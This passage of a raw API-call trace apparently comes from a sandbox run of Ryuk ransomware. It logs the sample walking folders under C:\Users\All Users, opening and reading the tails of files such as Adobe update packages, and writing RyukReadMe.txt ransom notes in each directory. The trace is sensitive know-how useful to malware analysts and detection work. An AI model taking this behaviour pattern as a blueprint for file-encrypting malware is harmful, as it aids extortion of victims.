Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.494] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.494] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.494] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.495] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", dwFileAttributes=0x80) returned 0 [0159.495] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.495] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.495] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.495] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.495] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.495] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.495] SetLastError (dwErrCode=0x0) [0159.495] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0159.495] GetLastError () returned 0xb7 [0159.495] CloseHandle (hObject=0xe4) returned 1 [0159.495] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.495] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.495] SetLastError (dwErrCode=0x0) [0159.495] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0159.496] GetLastError () returned 0xb7 [0159.496] CloseHandle (hObject=0x190) returned 1 [0159.496] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.496] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.496] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.496] SetLastError (dwErrCode=0x0) [0159.496] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.496] GetLastError () returned 0xb7 [0159.496] CloseHandle (hObject=0x18c) returned 1 [0159.496] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.496] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.496] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.496] SetLastError (dwErrCode=0x0) [0159.496] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0159.496] GetLastError () returned 0xb7 [0159.496] CloseHandle (hObject=0x188) returned 1 [0159.496] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.496] SetLastError (dwErrCode=0x0) [0159.496] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0159.496] GetLastError () returned 0xb7 [0159.496] CloseHandle (hObject=0x188) returned 1 [0159.496] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.497] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.497] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.497] SetLastError (dwErrCode=0x0) [0159.497] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\arm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.497] GetLastError () returned 0xb7 [0159.497] CloseHandle (hObject=0x18c) returned 1 [0159.497] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.497] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.497] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.497] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.497] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", dwFileAttributes=0x80) returned 1 [0159.497] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0159.498] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=252194) returned 1 [0159.498] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=252194) returned 1 [0159.498] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x3d800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.498] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0159.498] CloseHandle (hObject=0x190) returned 1 [0159.498] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.498] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.498] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.499] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", dwFileAttributes=0x80) returned 1 [0159.499] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0159.499] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=17707302) returned 1 [0159.499] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=17707302) returned 1 [0159.499] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x10e3004, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.499] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0159.500] CloseHandle (hObject=0x190) returned 1 [0159.500] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.500] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.500] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.500] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", dwFileAttributes=0x80) returned 1 [0159.500] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0159.500] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=17420582) returned 1 [0159.501] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=17420582) returned 1 [0159.501] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x109d004, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.501] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0159.501] CloseHandle (hObject=0x190) returned 1 [0159.501] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.501] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.501] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.501] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.501] SetLastError (dwErrCode=0x0) [0159.502] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.502] GetLastError () returned 0xb7 [0159.502] CloseHandle (hObject=0x18c) returned 1 [0159.502] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.502] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.502] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.502] SetLastError (dwErrCode=0x0) [0159.502] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\arm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0159.502] GetLastError () returned 0xb7 [0159.502] CloseHandle (hObject=0x188) returned 1 [0159.502] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.502] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0159.502] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0159.502] SetLastError (dwErrCode=0x0) [0159.502] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.502] GetLastError () returned 0xb7 [0159.502] CloseHandle (hObject=0x184) returned 1 [0159.502] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.502] SetLastError (dwErrCode=0x0) [0159.502] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.503] GetLastError () returned 0xb7 [0159.503] CloseHandle (hObject=0x184) returned 1 [0159.503] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0159.503] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.503] SetLastError (dwErrCode=0x0) [0159.503] CreateFileW (lpFileName="C:\\Users\\All Users\\Application Data\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\application data\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.503] GetLastError () returned 0xb7 [0159.503] CloseHandle (hObject=0x184) returned 1 [0159.503] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.503] SetLastError (dwErrCode=0x0) [0159.503] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.503] GetLastError () returned 0xb7 [0159.503] CloseHandle (hObject=0x184) returned 1 [0159.503] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Desktop\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0159.503] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.503] SetLastError (dwErrCode=0x0) [0159.503] CreateFileW (lpFileName="C:\\Users\\All Users\\Desktop\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\desktop\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.504] GetLastError () returned 0x5 [0159.504] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.504] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.504] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.504] SetLastError (dwErrCode=0x0) [0159.504] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.504] GetLastError () returned 0xb7 [0159.504] CloseHandle (hObject=0x184) returned 1 [0159.504] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0159.504] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.504] SetLastError (dwErrCode=0x0) [0159.504] CreateFileW (lpFileName="C:\\Users\\All Users\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.504] GetLastError () returned 0xb7 [0159.504] CloseHandle (hObject=0x184) returned 1 [0159.504] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.504] SetLastError (dwErrCode=0x0) [0159.504] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.504] GetLastError () returned 0xb7 [0159.504] CloseHandle (hObject=0x184) returned 1 [0159.504] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Favorites\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0159.504] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.504] SetLastError (dwErrCode=0x0) [0159.505] CreateFileW (lpFileName="C:\\Users\\All Users\\Favorites\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\favorites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.505] GetLastError () returned 0xb7 [0159.505] CloseHandle (hObject=0x184) returned 1 [0159.505] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.505] SetLastError (dwErrCode=0x0) [0159.505] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.505] GetLastError () returned 0xb7 [0159.505] CloseHandle (hObject=0x184) returned 1 [0159.505] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0159.505] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.505] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.505] SetLastError (dwErrCode=0x0) [0159.505] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.505] GetLastError () returned 0x5 [0159.505] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.505] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.505] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.505] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.505] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.505] SetLastError (dwErrCode=0x0) [0159.505] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.506] GetLastError () returned 0x5 [0159.506] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.506] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.506] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.506] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.506] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.506] SetLastError (dwErrCode=0x0) [0159.506] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.506] GetLastError () returned 0x5 [0159.506] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.506] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.506] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.506] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.506] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.506] SetLastError (dwErrCode=0x0) [0159.506] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.506] GetLastError () returned 0x5 [0159.506] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.506] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.506] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.507] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.507] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.507] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.507] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D", dwFileAttributes=0x80) returned 0 [0159.508] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.508] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.508] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.508] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.508] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.508] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W", dwFileAttributes=0x80) returned 0 [0159.508] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.508] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.508] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.508] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.508] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.509] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W", dwFileAttributes=0x80) returned 0 [0159.509] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.509] CloseHandle 